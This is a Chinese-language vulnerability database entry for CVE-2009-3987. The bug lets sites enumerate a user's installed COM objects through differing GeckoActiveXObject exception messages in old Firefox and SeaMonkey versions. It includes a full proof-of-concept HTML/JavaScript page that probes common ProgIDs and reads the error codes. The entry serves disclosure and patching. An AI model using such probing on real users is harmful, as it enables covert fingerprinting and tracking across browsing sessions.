Firefox GeckoActiveXObject异常消息COM对象枚举漏洞

2009-12-20T00:00:00
ID SSV:15113
Type seebug
Reporter Root
Modified 2009-12-20T00:00:00

Description

BUGTRAQ ID: 37360 CVE(CAN) ID: CVE-2009-3987

Firefox是一款流行的开源WEB浏览器。

Mozilla的GeckoActiveXObject所生成的异常消息会根据系统注册表中是否存在所请求COM对象的ProgID而不同,恶意站点可以根据这个差异枚举出用户系统上所安装的COM对象列表,并创建配置文件跨浏览会话追踪用户。

Mozilla Firefox 3.5.x Mozilla Firefox 3.0.x Mozilla SeaMonkey 2.0 厂商补丁:

Mozilla

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

                                        
                                            
                                                <?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<!--
Copyright (c) 2009, Gregory Fleischer (gfleischer@gmail.com)
License: Revised BSD
-->
<head>
<title>COM Enumeration using GeckoActiveXObject</title>
<script type="text/javascript">//<![CDATA[

var matches = [];

var progIDs = [
    "akadlkasdlfkj.akadlkasdlfkj",
    "MSXML2.DOMDocument","MSXML2.DOMDocument.2.0",
    "MSXML2.DOMDocument.3.0", "MSXML2.DOMDocument.4.0",
    "MSXML2.DOMDocument.5.0", "MSXML2.DOMDocument.6.0",
    "Word.Document.6", "Word.Document.8", "Word.Document.10",
    "Word.Document.12",
    "QuickTime.QuickTime", "QuickTime.QuickTime.9",
    "RealPlayer.HWEventHandler",
    "JavaPlugin", "JavaPlugin.FamilyVersionSupport",
    "JavaPlugin.160_12", "JavaPlugin.160_13",
    "JavaPlugin.160_14",
    "ShockwaveFlash.ShockwaveFlash",
    "ShockwaveFlash.ShockwaveFlash.11",
    "ShockwaveFlash.ShockwaveFlash.10",
    "ShockwaveFlash.ShockwaveFlash.9",
    "ShockwaveFlash.ShockwaveFlash.6",
];

function check_object(progID) {
    try {
    var obj = new GeckoActiveXObject(progID);
    } catch (e) {
    var err = e.toString();
    if (err.match(/COM\s*Error\s*Result\s*=\s*80004005/i)) {
        matches.push(progID);
    } else if (!err.match(/COM\s*Error\s*Result\s*=\s*800401f3/i)) {
        alert("unexpected response: " + e);
    }
    }
}

function test(){

    matches = [];

    if ("undefined" == typeof(window.GeckoActiveXObject)) {
    alert("GeckoActiveXObject only supported on Windows");
    } else {
    for (var i = 0; i < progIDs.length; ++i) {
        check_object(progIDs[i]);
    }
    }

    if (matches.length > 0) {
    if (matches.length == progIDs.length) {
        alert("matched everything? that's unlikely");
    } else {
        alert("matched: " + matches.join(", "));
    }
    } else {
    alert("no matches detected");
    }
}

function init() {
}

//]]>
</script>
</head>
<body onload="init();">
GeckoActiveXObject exceptions:
<ul>
<li>COM object not installed: COM Error Result = 800401f3</li>
<li>COM object installed: COM Error Result = 80004005</li>
</ul>

<input type="button" name="run test" value="run test" onclick="test()"/>
</body>
</html>
<!-- Keep this comment at the end of the file
Local variables:
mode:xml-html
sgml-declaration:"~/lib/DTD/xhtml1/xhtml1.dcl"
sgml-default-dtd-file:"~/lib/DTD/xhtml1/xhtml1-transitional.ced"
End:
-->